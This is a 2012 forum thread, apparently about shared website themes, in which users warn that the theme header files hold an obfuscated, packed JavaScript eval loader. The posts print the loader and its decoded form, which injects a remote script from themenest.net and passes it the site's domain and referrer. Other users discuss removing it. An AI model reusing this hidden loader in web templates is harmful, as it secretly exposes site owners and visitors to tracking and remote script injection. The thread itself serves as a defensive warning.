32.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

08-30-2012, 07:38 AM
Post: #11
RE:
whohooo thanks!
10-12-2012, 08:50 AM
Post: #12
RE:
BE AWARE - ALL header files are poisoned with this code:

Code:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|n​et|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000​|script'.split('|'),0,{}));
decode of this packed code:
Code:
document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');
11-04-2012, 04:15 AM
Post: #13
RE:
Sorry for the silly question. However, gnollik is there anyway to fix it, like maybe remove the cade provided aboveor just dont use these themes.

thanks in advance.
11-11-2012, 09:13 PM
Post: #14
RE:
Great..

A bunch of thanks :)
11-14-2012, 03:55 PM
Post: #15
RE:
(10-12-2012 08:50 AM)gnollik Wrote:  
BE AWARE - ALL header files are poisoned with this code:

Code:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'">\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|n​et|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000​|script'.split('|'),0,{}));
decode of this packed code:
Code:
document.write('');




Please respond to this post, are these themes infected with above mentioned code?
6.gif
11-15-2012, 02:48 AM
Post: #16
RE:
great man. thank you!
11-21-2012, 04:16 AM
Post: #17
RE:
has anyone used these themes and had any dram a with the infection in the headers?

as asked before, is it possible to remove them?

cheers
11-23-2012, 11:06 PM
Post: #18
RE:
I tried taking out the header code in one theme, since it doesn't seem to do anything other than call the script on themenest.net, and the template works fine. Looking at the generated source code there are no other calls to themenest.net.
11-24-2012, 01:24 AM
Post: #19
RE:
(11-23-2012 11:06 PM)shiitake Wrote:  Thanks for clarifying.
(11-23-2012 11:06 PM)shiitake Wrote:  I tried taking out the header code in one theme, since it doesn't seem to do anything other than call the script on themenest.net, and the template works fine. Looking at the generated source code there are no other calls to themenest.net.
11-24-2012, 05:06 PM
Post: #20
RE:
this is an awesome share thank you
12.gif




18.gif